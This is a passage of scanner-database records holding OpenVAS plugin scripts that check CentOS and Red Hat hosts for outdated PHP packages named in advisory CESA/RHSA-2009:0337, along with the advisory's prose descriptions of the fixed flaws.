your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:0337\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:0337\nhttps://rhn.redhat.com/errata/RHSA-2009-0337.html\";\ntag_summary = \"The remote host is missing updates to php announced in\nadvisory CESA-2009:0337.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63827\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-15 22:11:00 +0200 (Wed, 15 Apr 2009)\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:0337 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:56", "bulletinFamily": "scanner", "description": "The remote host is missing updates to php announced in\nadvisory CESA-2009:0337.", "modified": "2017-07-10T00:00:00", "published": "2009-04-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63827", "id": "OPENVAS:63827", "title": "CentOS Security Advisory CESA-2009:0337 (php)", "type": "openvas", "sourceData": "#CESA-2009:0337 63827 8\n# $Id: ovcesa2009_0337.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:0337 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:0337\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:0337\nhttps://rhn.redhat.com/errata/RHSA-2009-0337.html\";\ntag_summary = \"The remote host is missing updates to php announced in\nadvisory CESA-2009:0337.\";\n\n\n\nif(description)\n{\n script_id(63827);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-15 22:11:00 +0200 (Wed, 15 Apr 2009)\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Security Advisory CESA-2009:0337 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"CentOS3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:02", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0337.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the mbstring.func_overload\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\nbackground color argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-04-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063755", "id": "OPENVAS:136141256231063755", "title": "RedHat Security Advisory RHSA-2009:0337", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0337.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0337 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0337.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the mbstring.func_overload\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\nbackground color argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63755\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-15 22:11:00 +0200 (Wed, 15 Apr 2009)\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0337\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0337.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.2~51.ent\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-18T14:43:26", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880938", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880938", "title": "CentOS Update for php CESA-2009:0337 centos4 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2009:0337 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-April/015806.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880938\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:0337\");\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_name(\"CentOS Update for php CESA-2009:0337 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"php on CentOS 4\");\n script_tag(name:\"insight\", value:\"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Web server.\n\n A heap-based buffer overflow flaw was found in PHP's mbstring extension. A\n remote attacker able to pass arbitrary input to a PHP script using mbstring\n conversion functions could cause the PHP interpreter to crash or,\n possibly, execute arbitrary code. (CVE-2008-5557)\n\n A flaw was found in the handling of the 'mbstring.func_overload'\n configuration setting. A value set for one virtual host, or in a user's\n .htaccess file, was incorrectly applied to other virtual hosts on the same\n server, causing the handling of multibyte character strings to not work\n correctly. (CVE-2009-0754)\n\n A buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\n script allowed a remote attacker to load a carefully crafted font file, it\n could cause the PHP interpreter to crash or, possibly, execute arbitrary\n code. (CVE-2008-3658)\n\n A flaw was found in the way PHP handled certain file extensions when\n running in FastCGI mode. If the PHP interpreter was being executed via\n FastCGI, a remote attacker could create a request which would cause the PHP\n interpreter to crash. (CVE-2008-3660)\n\n A memory disclosure flaw was found in the PHP gd extension's imagerotate\n function. A remote attacker able to pass arbitrary values as the\n 'background color' argument of the function could, possibly, view portions\n of the PHP interpreter's memory. (CVE-2008-5498)\n\n All php users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. The httpd web server\n must be restarted for the changes to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:44", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880871", "id": "OPENVAS:880871", "title": "CentOS Update for php CESA-2009:0337 centos3 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2009:0337 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 